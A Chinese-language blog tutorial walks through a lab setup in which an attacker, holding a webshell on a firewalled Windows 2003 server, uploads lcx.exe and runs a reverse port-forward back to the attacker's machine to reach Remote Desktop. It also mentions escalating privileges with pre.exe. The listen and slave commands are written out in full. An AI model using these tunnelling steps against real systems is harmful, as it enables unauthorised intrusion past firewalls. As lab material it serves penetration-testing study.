lcx 端口轉發

lcx.exe 端口轉發

環境搭建

首先網絡拓撲是這樣的。

img

攻擊機:個人PC 192.168.124.1

內網服務器: win2003 server VM 8 : 192.168.124.129

VM 1 : 192.168.2.103

win2008 server VM 1 : 192.168.2.108

前提:反彈端口的主機可以訪問公網

ps:這裏利用的虛擬機雙網卡完成環境搭建,真時情況可能是目標主機反彈到公網VPS。

首先獲取到了win2003的webshell ,但是這個服務器防火牆規則只開啓了80端口供外網訪問,所以拿到了webshell也無法通過創建賬號利用3389端口遠程連接。所以既不能遠程連接又不可以掃描內網。此時就需要內網滲透技術。

這裏lcx

img

利用lcx.exe反彈端口

建立隧道:

首先需要在攻擊機和內網肉雞上傳lcx反彈端口的exe文件,並按如下過程執行命令。

攻擊機:192.168.124.1

執行: lcx.exe -listen 4444 5555

同時監聽 4444 和 5555端口

img

肉雞:192.168.124.129

執行: 網站目錄/lcx.exe -slave 192.168.124.1 4444 192.168.124.129 3389

注意肉雞的lcx.exe文件需要上傳到80端口網站所對應的網站目錄下。不然無法執行命令,且必須有高權限。比如用pre.exe進行提權,在pre的環境下執行:pre.exe “lcx.exe -slave 192.168.124.1 4444 192.168.124.129 3389”。

隧道拓撲:

img

執行完上述兩條命令後,在攻擊機上 win+R -> 輸入mstsc ,調出遠程桌面程序。

訪問本機5555端口即可。

img

完成!

img

Ps:因爲win2003server開啓了防火牆,應該是win2003server入站規則禁用了ICMP主機也就沒辦法ping通win20003了,但是隧道機制是基於傳輸層上的TCP/UDP ,所以可以在應用層之間完成傳輸數據,達到遠程桌面連接。

也就是通過 192.168.124.1:4444------------192.168.124.129:3389 這個隧道(TCP連接)向攻擊機開啓了一個5555端口,而攻擊機通過訪問5555端口來加入這個隧道進而實現遠程桌面連接(與肉雞3389端口的通信)。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章